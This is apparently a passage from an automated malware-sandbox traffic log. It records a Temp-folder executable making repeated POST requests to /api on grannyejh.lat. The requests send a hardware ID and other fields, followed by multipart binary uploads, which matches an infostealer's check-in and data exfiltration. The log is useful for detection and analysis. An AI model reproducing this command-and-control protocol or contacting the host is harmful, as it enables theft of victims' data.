                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bZyvkZsqQ4AHIuXAZW6tlsgXQ58k2gi83XhBMHFFOsot4Sn8jgc4LC3f4Bjatmsikr88lNmliB1B%2BP3kWGcqhipUZzc0cD%2BhLWsoge1RUjiyG%2FEUbi%2FGhVpMpoX%2BvDUU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b1d02a980fa8-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1671&rtt_var=647&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1664766&cwnd=252&unsent_bytes=0&cid=c84f45f73477f92a&ts=755&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                          2024-12-19 13:21:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          15192.168.2.449841104.21.64.804435812C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 52
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d
                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6989783370&j=
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC1115INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:16 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3p8b6a6km976in3optdoldfelg; expires=Mon, 14 Apr 2025 07:07:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=buEHPK%2Bdqx5v5f9UtjLtqMDPGaJxnZLzKrR9uY4FY73bm5wn7Qe4USvkGH0V2eQyXC23t8Wfb4LwuVPmpbo%2F3wea37OJ6bPvPsUrvJvf7IeXF8D9hcf89gwLPm3UAhp0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b1dd6f5bc3ff-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1463&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=949&delivery_rate=1916010&cwnd=246&unsent_bytes=0&cid=5f0625314909929c&ts=773&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC254INData Raw: 31 63 61 65 0d 0a 50 64 76 66 50 69 33 43 77 33 49 6f 31 72 4c 4b 67 6c 2f 69 30 6c 58 42 67 6b 7a 32 74 57 70 72 68 45 75 76 5a 43 67 71 4d 37 56 47 2b 61 6b 63 46 2f 62 76 55 46 75 7a 6b 50 44 32 4c 5a 65 33 65 65 50 6a 4b 4e 53 50 44 41 72 6f 4f 4d 70 49 43 6c 78 65 6c 77 65 39 76 6c 4a 65 70 2b 39 51 54 61 36 51 38 4e 6b 6b 77 4c 63 37 34 37 68 75 6b 39 38 49 43 75 67 70 7a 67 39 48 57 6c 2f 57 56 62 65 34 56 6b 69 68 70 78 4e 45 75 39 65 76 35 7a 36 49 76 44 79 73 36 69 48 55 6d 55 67 4f 2f 6d 6d 56 52 6d 56 50 52 39 52 77 75 71 78 56 44 37 2f 76 43 51 71 7a 33 4f 69 34 66 59 4f 33 4e 36 33 6b 4b 4a 33 64 41 67 50 67 4b 4d 73 4f 57 45 4e 56 33 56 57 35 75 31 64 43 71 4c 4d 65 54 72 7a 63 71 65 30 2b 77 50 35 33 70 50 68 75 7a 4a 64 62 4f 2b 55 34
                                                                                                                                                                                                                                                          Data Ascii: 1caePdvfPi3Cw3Io1rLKgl/i0lXBgkz2tWprhEuvZCgqM7VG+akcF/bvUFuzkPD2LZe3eePjKNSPDAroOMpIClxelwe9vlJep+9QTa6Q8NkkwLc747huk98ICugpzg9HWl/WVbe4VkihpxNEu9ev5z6IvDys6iHUmUgO/mmVRmVPR9RwuqxVD7/vCQqz3Oi4fYO3N63kKJ3dAgPgKMsOWENV3VW5u1dCqLMeTrzcqe0+wP53pPhuzJdbO+U4
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC1369INData Raw: 33 42 4e 48 57 46 65 58 51 50 65 6b 48 45 69 73 34 55 67 4b 76 4e 79 6d 35 54 36 50 74 7a 61 6a 38 69 47 55 31 41 41 42 34 69 50 43 43 55 56 47 57 39 42 58 73 4c 70 54 53 4b 69 6e 48 30 6e 30 6e 75 6a 6e 4a 63 44 6f 64 34 50 77 4c 5a 66 44 42 52 69 6d 4e 6f 4d 66 43 6b 39 64 6c 77 66 35 75 31 4a 4f 72 61 45 43 51 72 2f 62 72 66 49 32 69 62 30 36 6f 2b 30 6b 6d 39 51 49 44 75 77 6a 77 67 78 4f 52 56 7a 52 58 37 6e 39 45 67 2b 6e 75 56 41 53 39 50 4f 74 38 44 71 4d 70 6e 57 5a 6f 44 48 61 7a 6b 67 4f 36 6d 6d 56 52 6b 4a 4e 55 74 52 55 74 72 35 55 52 4c 4b 68 41 6b 79 35 31 62 72 6d 4f 49 36 36 4e 4c 48 71 49 4a 4c 55 41 51 4c 76 4c 4d 6f 43 43 67 59 52 30 45 66 35 35 52 78 75 72 61 6f 63 51 4b 50 51 36 50 39 7a 6d 66 41 77 72 36 42 32 31 4e 4d 4a 44 65 63
                                                                                                                                                                                                                                                          Data Ascii: 3BNHWFeXQPekHEis4UgKvNym5T6Ptzaj8iGU1AAB4iPCCUVGW9BXsLpTSKinH0n0nujnJcDod4PwLZfDBRimNoMfCk9dlwf5u1JOraECQr/brfI2ib06o+0km9QIDuwjwgxORVzRX7n9Eg+nuVAS9POt8DqMpnWZoDHazkgO6mmVRkJNUtRUtr5URLKhAky51brmOI66NLHqIJLUAQLvLMoCCgYR0Ef55RxuraocQKPQ6P9zmfAwr6B21NMJDec
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC1369INData Raw: 67 67 4a 6c 33 57 36 71 56 39 46 34 70 51 54 52 4c 72 58 76 71 41 69 7a 71 6c 33 70 4f 78 75 7a 4a 63 46 43 4f 34 76 33 77 6c 48 53 31 2f 5a 55 4c 79 79 56 45 2b 67 72 42 56 4f 76 39 75 72 37 54 6d 53 75 6a 65 72 35 53 2b 65 33 55 68 48 70 69 37 56 52 68 49 49 59 4d 42 55 2b 34 68 66 51 61 36 6d 42 67 71 72 6e 72 47 67 4f 6f 7a 77 62 2b 50 74 4a 70 48 53 42 77 6a 73 4a 38 67 4d 52 6b 42 66 31 45 32 32 75 56 78 44 71 4b 73 64 52 4c 44 59 6f 65 73 32 68 72 41 32 71 61 42 67 31 4e 41 51 53 62 35 70 2b 51 46 47 52 56 36 56 61 72 71 7a 55 6b 69 32 34 51 38 45 72 5a 43 76 37 48 33 59 38 44 75 71 34 43 57 65 30 77 67 4f 36 79 7a 4f 41 55 6c 46 56 74 31 52 76 72 6c 51 52 71 32 6e 45 45 32 77 31 62 72 6c 4e 49 79 38 64 2b 32 67 4b 59 79 58 55 45 6e 4a 4c 74 73 46
                                                                                                                                                                                                                                                          Data Ascii: ggJl3W6qV9F4pQTRLrXvqAizql3pOxuzJcFCO4v3wlHS1/ZULyyVE+grBVOv9ur7TmSujer5S+e3UhHpi7VRhIIYMBU+4hfQa6mBgqrnrGgOozwb+PtJpHSBwjsJ8gMRkBf1E22uVxDqKsdRLDYoes2hrA2qaBg1NAQSb5p+QFGRV6VarqzUki24Q8ErZCv7H3Y8Duq4CWe0wgO6yzOAUlFVt1RvrlQRq2nEE2w1brlNIy8d+2gKYyXUEnJLtsF
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC1369INData Raw: 35 4e 74 37 4e 56 51 71 61 70 46 30 53 35 32 36 37 72 4f 6f 65 32 4f 71 76 74 4b 35 66 57 44 41 50 30 4b 73 59 4d 52 30 49 52 6d 52 2b 2b 70 52 77 58 34 49 59 63 59 36 54 4c 75 76 5a 39 6e 2f 34 75 34 2b 63 69 31 49 39 49 43 75 6b 67 77 67 35 43 52 31 37 54 55 62 2b 37 55 55 71 76 71 77 4a 43 75 74 32 6a 37 7a 61 53 73 44 71 6e 37 43 71 63 33 41 4a 4a 71 47 6e 4b 48 67 6f 51 45 65 4a 53 74 72 31 66 57 65 43 2b 58 6c 50 30 31 36 53 67 5a 63 43 38 4f 61 50 76 49 70 6a 63 41 41 6a 71 4a 38 6f 44 51 30 42 5a 78 56 36 39 74 56 31 42 72 36 41 55 54 37 48 55 72 2b 51 37 6a 2f 42 35 34 2b 63 32 31 49 39 49 4a 73 45 63 6a 79 64 77 43 45 36 5a 52 76 6d 36 55 41 2f 34 34 52 78 4a 75 4e 69 6e 35 6a 53 4d 75 6a 36 6f 37 43 57 51 32 77 45 4d 34 43 6a 49 41 30 74 4d 58
                                                                                                                                                                                                                                                          Data Ascii: 5Nt7NVQqapF0S5267rOoe2OqvtK5fWDAP0KsYMR0IRmR++pRwX4IYcY6TLuvZ9n/4u4+ci1I9ICukgwg5CR17TUb+7UUqvqwJCut2j7zaSsDqn7Cqc3AJJqGnKHgoQEeJStr1fWeC+XlP016SgZcC8OaPvIpjcAAjqJ8oDQ0BZxV69tV1Br6AUT7HUr+Q7j/B54+c21I9IJsEcjydwCE6ZRvm6UA/44RxJuNin5jSMuj6o7CWQ2wEM4CjIA0tMX
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC1369INData Raw: 77 55 30 65 6f 71 42 46 4f 73 64 32 75 37 44 65 42 74 7a 6d 74 36 47 37 61 6c 77 38 52 70 6e 47 4e 4a 31 70 54 51 38 46 53 6d 4c 42 54 44 37 2f 76 43 51 71 7a 33 4f 69 34 66 59 6d 69 4d 36 37 79 4a 35 50 5a 42 77 72 30 4b 4d 41 4e 57 45 39 65 30 31 69 31 75 31 4e 4a 6f 61 51 61 52 72 50 56 6f 2b 38 78 77 50 35 33 70 50 68 75 7a 4a 63 6d 41 76 55 2b 7a 67 68 42 58 6b 71 58 51 50 65 6b 48 45 69 73 34 55 67 4b 74 39 75 6a 35 44 32 4d 73 44 4f 75 34 44 79 62 30 41 38 41 37 54 76 48 41 55 31 44 57 64 78 51 76 36 39 51 51 62 4b 6b 41 6c 6a 30 6e 75 6a 6e 4a 63 44 6f 64 35 58 6e 50 6f 54 55 53 6a 6a 77 4b 74 73 4e 52 30 51 52 79 42 47 67 2f 56 74 44 34 50 6c 51 54 4c 76 5a 71 2b 38 38 69 62 77 36 70 75 6b 72 6c 64 45 4d 41 2b 77 70 79 77 42 4c 54 56 76 55 58 72
                                                                                                                                                                                                                                                          Data Ascii: wU0eoqBFOsd2u7DeBtzmt6G7alw8RpnGNJ1pTQ8FSmLBTD7/vCQqz3Oi4fYmiM67yJ5PZBwr0KMANWE9e01i1u1NJoaQaRrPVo+8xwP53pPhuzJcmAvU+zghBXkqXQPekHEis4UgKt9uj5D2MsDOu4Dyb0A8A7TvHAU1DWdxQv69QQbKkAlj0nujnJcDod5XnPoTUSjjwKtsNR0QRyBGg/VtD4PlQTLvZq+88ibw6pukrldEMA+wpywBLTVvUXr
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC1369INData Raw: 34 4b 49 58 53 62 58 61 6f 65 77 79 68 37 51 6c 71 65 63 38 6c 64 59 44 42 4f 6f 70 77 41 74 41 53 56 6a 61 55 37 53 36 57 30 43 6c 34 56 34 4b 73 38 6a 6f 75 48 32 68 76 54 79 76 75 33 54 55 79 45 59 51 70 69 37 42 52 68 49 49 55 64 31 61 73 37 42 66 51 4b 4f 7a 45 55 79 6d 30 4b 58 71 4c 34 71 37 4d 71 37 74 49 35 66 52 44 67 4c 71 4f 38 51 47 53 55 4d 52 6d 52 2b 2b 70 52 77 58 34 49 49 48 58 4c 37 58 70 50 59 32 67 62 4d 68 72 76 42 75 32 70 63 5a 44 76 64 70 6c 52 42 61 58 31 62 49 45 61 44 39 57 30 50 67 2b 56 42 4d 76 64 61 76 35 6a 4f 53 74 54 47 73 37 79 65 64 30 77 41 4b 35 69 33 4a 41 55 39 4c 58 64 78 59 75 72 4a 59 52 71 36 6f 48 77 72 36 6b 4b 2f 34 66 64 6a 77 46 72 6a 6a 49 70 6d 58 46 30 66 2f 61 63 6f 4b 43 68 41 52 32 31 47 38 76 56 5a
                                                                                                                                                                                                                                                          Data Ascii: 4KIXSbXaoewyh7Qlqec8ldYDBOopwAtASVjaU7S6W0Cl4V4Ks8jouH2hvTyvu3TUyEYQpi7BRhIIUd1as7BfQKOzEUym0KXqL4q7Mq7tI5fRDgLqO8QGSUMRmR++pRwX4IIHXL7XpPY2gbMhrvBu2pcZDvdplRBaX1bIEaD9W0Pg+VBMvdav5jOStTGs7yed0wAK5i3JAU9LXdxYurJYRq6oHwr6kK/4fdjwFrjjIpmXF0f/acoKChAR21G8vVZ
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC251INData Raw: 67 69 42 30 36 62 75 4f 70 62 77 4b 4a 79 75 62 70 76 4e 53 46 48 66 4d 49 30 42 52 67 67 4a 6c 30 71 2b 76 56 74 56 74 71 59 63 57 37 2f 64 70 4d 49 79 68 36 59 30 72 4f 4d 2f 6e 5a 73 44 42 4b 5a 6e 6a 51 46 53 43 41 6d 58 63 4c 36 72 58 32 43 6a 73 42 6b 4b 2b 70 43 76 39 6e 33 59 38 41 6e 6a 38 69 32 45 31 41 63 59 32 47 6d 56 48 33 51 49 57 73 46 59 71 62 35 4b 52 4b 32 74 41 58 54 30 69 50 79 79 62 39 4c 69 5a 62 79 67 4d 61 75 5a 53 41 69 6d 63 66 51 66 43 6c 34 52 6a 77 33 33 2f 55 34 50 2b 4f 46 58 53 61 62 43 72 75 4d 72 67 2f 63 4a 6e 63 63 34 6e 74 41 59 44 76 45 6d 6a 55 67 4b 52 78 47 50 5a 76 6d 30 57 31 53 78 74 78 31 61 73 35 43 58 72 6e 32 59 38 47 2f 6a 31 53 32 61 32 51 38 66 39 32 54 71 45 45 42 50 51 64 42 49 74 76 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: giB06buOpbwKJyubpvNSFHfMI0BRggJl0q+vVtVtqYcW7/dpMIyh6Y0rOM/nZsDBKZnjQFSCAmXcL6rX2CjsBkK+pCv9n3Y8Anj8i2E1AcY2GmVH3QIWsFYqb5KRK2tAXT0iPyyb9LiZbygMauZSAimcfQfCl4Rjw33/U4P+OFXSabCruMrg/cJncc4ntAYDvEmjUgKRxGPZvm0W1Sxtx1as5CXrn2Y8G/j1S2a2Q8f92TqEEBPQdBItv
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC1369INData Raw: 32 63 36 65 0d 0a 30 53 44 36 62 68 53 42 6e 36 6b 4b 7a 78 66 64 6a 67 5a 66 69 31 66 63 4f 48 57 68 61 6f 4d 49 30 51 43 68 41 44 6d 52 2b 72 2f 51 51 50 35 36 49 43 57 4c 4c 54 76 75 4e 36 76 6f 34 51 75 65 30 6f 67 38 59 32 4e 2b 45 7a 77 41 42 64 57 52 33 43 58 4c 65 7a 57 31 6e 67 37 31 42 46 39 49 69 52 6f 48 58 41 6a 33 6e 6a 2b 47 37 4d 6c 7a 30 4b 36 43 66 4b 45 46 73 46 64 73 31 53 76 36 70 4e 44 2b 37 68 46 67 72 73 67 4f 61 67 4f 5a 48 77 62 2f 4f 79 64 63 47 45 58 31 6d 30 4e 6f 4d 66 43 6c 34 52 6a 77 33 33 2f 55 34 50 2b 4f 46 58 53 61 62 43 72 75 4d 72 67 2f 63 4a 6e 63 34 70 6b 74 49 50 47 61 51 48 78 68 4a 4e 43 42 2b 58 55 50 6e 6c 5a 51 2f 6f 34 53 38 45 39 4d 6a 6f 75 48 32 31 73 7a 6d 74 35 7a 69 46 6d 69 59 4f 34 43 7a 4b 46 67 68
                                                                                                                                                                                                                                                          Data Ascii: 2c6e0SD6bhSBn6kKzxfdjgZfi1fcOHWhaoMI0QChADmR+r/QQP56ICWLLTvuN6vo4Que0og8Y2N+EzwABdWR3CXLezW1ng71BF9IiRoHXAj3nj+G7Mlz0K6CfKEFsFds1Sv6pND+7hFgrsgOagOZHwb/OydcGEX1m0NoMfCl4Rjw33/U4P+OFXSabCruMrg/cJnc4pktIPGaQHxhJNCB+XUPnlZQ/o4S8E9MjouH21szmt5ziFmiYO4CzKFgh
                                                                                                                                                                                                                                                          2024-12-19 13:21:16 UTC1369INData Raw: 2b 76 7a 48 46 33 67 2b 56 41 4e 74 38 4b 36 35 6a 36 57 73 33 43 64 33 67 6d 61 30 41 6b 66 39 6a 37 43 53 57 52 2b 63 4f 6c 68 72 4c 35 53 51 61 65 33 41 51 72 36 6b 4b 65 67 5a 62 6e 77 66 2b 50 66 59 4e 54 50 53 46 47 6d 48 4d 34 49 52 45 39 48 78 68 4b 65 73 31 74 4f 74 72 45 48 52 66 76 2b 6e 73 46 39 7a 76 41 78 34 37 68 38 32 70 63 4d 47 4b 5a 78 6e 56 51 52 48 51 4b 41 44 2b 75 69 45 6c 62 67 74 31 41 53 35 70 37 6f 38 6e 33 59 38 48 43 67 38 6a 79 53 31 42 34 4b 6f 52 66 7a 49 55 52 50 55 4d 46 50 74 4c 46 39 54 4c 47 72 4c 6e 53 68 30 36 62 75 4f 70 61 68 64 2b 32 67 49 64 53 50 4d 55 6d 75 61 66 4a 49 43 6c 41 52 6a 78 2b 4d 76 6c 4a 42 70 37 63 42 42 35 50 65 72 2b 45 72 6b 4c 30 37 67 75 4d 2f 6e 70 64 47 53 65 42 70 6c 56 51 45 43 46 58 47
                                                                                                                                                                                                                                                          Data Ascii: +vzHF3g+VANt8K65j6Ws3Cd3gma0Akf9j7CSWR+cOlhrL5SQae3AQr6kKegZbnwf+PfYNTPSFGmHM4IRE9HxhKes1tOtrEHRfv+nsF9zvAx47h82pcMGKZxnVQRHQKAD+uiElbgt1AS5p7o8n3Y8HCg8jyS1B4KoRfzIURPUMFPtLF9TLGrLnSh06buOpahd+2gIdSPMUmuafJIClARjx+MvlJBp7cBB5Per+ErkL07guM/npdGSeBplVQECFXG


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          16192.168.2.449854104.21.64.804435812C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:19 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=YZQ2BMKKTU6DU1
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 18144
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:19 UTC15331OUTData Raw: 2d 2d 59 5a 51 32 42 4d 4b 4b 54 55 36 44 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 59 5a 51 32 42 4d 4b 4b 54 55 36 44 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 5a 51 32 42 4d 4b 4b 54 55 36 44 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 59 5a 51
                                                                                                                                                                                                                                                          Data Ascii: --YZQ2BMKKTU6DU1Content-Disposition: form-data; name="hwid"4D9AEFC7455232AC00D57F9DDD37BE0C--YZQ2BMKKTU6DU1Content-Disposition: form-data; name="pid"2--YZQ2BMKKTU6DU1Content-Disposition: form-data; name="lid"yau6Na--6989783370--YZQ
                                                                                                                                                                                                                                                          2024-12-19 13:21:19 UTC2813OUTData Raw: e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11
                                                                                                                                                                                                                                                          Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
                                                                                                                                                                                                                                                          2024-12-19 13:21:20 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:20 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=oa25m02t552u81d9023je5qjs2; expires=Mon, 14 Apr 2025 07:07:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sshg14aBPWxSlvTf0HaWwnqKkh4sIl53XKZdayNJxAVXCVaNgCoECxa38CXkCW07Ge26vRo06R4L03j0GDXJ0Ljs4mhBPykvW%2BlDBDYuxkhaVdiszo2sxtz51FmdHxFn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b1f28c49f799-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1448&rtt_var=574&sent=16&recv=21&lost=0&retrans=0&sent_bytes=2829&recv_bytes=19099&delivery_rate=1855146&cwnd=92&unsent_bytes=0&cid=25b4db76fc527499&ts=1123&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:21:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          17192.168.2.449862104.21.64.804435812C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:22 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=QQU6UU2WBGHBHVSSX
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8783
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:22 UTC8783OUTData Raw: 2d 2d 51 51 55 36 55 55 32 57 42 47 48 42 48 56 53 53 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 51 51 55 36 55 55 32 57 42 47 48 42 48 56 53 53 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 51 55 36 55 55 32 57 42 47 48 42 48 56 53 53 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33
                                                                                                                                                                                                                                                          Data Ascii: --QQU6UU2WBGHBHVSSXContent-Disposition: form-data; name="hwid"4D9AEFC7455232AC00D57F9DDD37BE0C--QQU6UU2WBGHBHVSSXContent-Disposition: form-data; name="pid"2--QQU6UU2WBGHBHVSSXContent-Disposition: form-data; name="lid"yau6Na--69897833
                                                                                                                                                                                                                                                          2024-12-19 13:21:22 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:22 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
